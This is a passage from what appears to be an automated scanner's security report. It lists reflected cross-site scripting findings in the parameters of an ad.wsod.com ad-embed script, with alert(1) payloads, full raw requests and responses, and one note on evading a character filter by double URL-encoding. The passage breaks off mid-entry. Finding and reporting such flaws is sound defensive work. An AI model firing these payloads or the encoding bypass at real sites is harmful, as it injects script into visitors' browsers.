HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:17 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843277:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:17 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; re ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52705'-alert(1)-'5838e5807a8 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:45 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843305:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:45 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { docume ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0a2'-alert(1)-'eddc83441b0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:59 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843319:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:59 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b108 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3646'-alert(1)-'9d3890ffc58 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:55 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843315:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:55 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write(' ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d724'-alert(1)-'aba732753ad was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:41 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843301:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:41 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image35 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2488'-alert(1)-'0a19383e732 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:34 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843294:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:34 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fun ...[SNIP]...
5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2bdf'-alert(1)-'051170363a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:42:04 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:42:04 GMT; path=/ Set-Cookie: i_1=33:353:516:141:0:45001:1303843324:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:42:04 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 855
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b1 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8654"-alert(1)-"c50bffdece4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898d8654"-alert(1)-"c50bffdece4&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610b1"-alert(1)-"b260c77153e was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628610b1"-alert(1)-"b260c77153e&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8199f"-alert(1)-"f38ee686c59 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e38199f"-alert(1)-"f38ee686c59 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba1a"-alert(1)-"c5e1d0c5d1a was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQeba1a"-alert(1)-"c5e1d0c5d1a&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8 was submitted in the REST URL parameter 2. This input was echoed as c5ea9";alert(1)//3e6670df6b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:32 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408 was submitted in the REST URL parameter 3. This input was echoed as 5e00b";alert(1)//abbd6d3e408 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x305e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a78"-alert(1)-"a549992a4e6 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=2825348846a78"-alert(1)-"a549992a4e6&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf8a"-alert(1)-"17ee62d1a47 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G3cf8a"-alert(1)-"17ee62d1a47&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 983cb"-alert(1)-"b33569e6d27 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!983cb"-alert(1)-"b33569e6d27&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9476a"-alert(1)-"985f8e3db43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
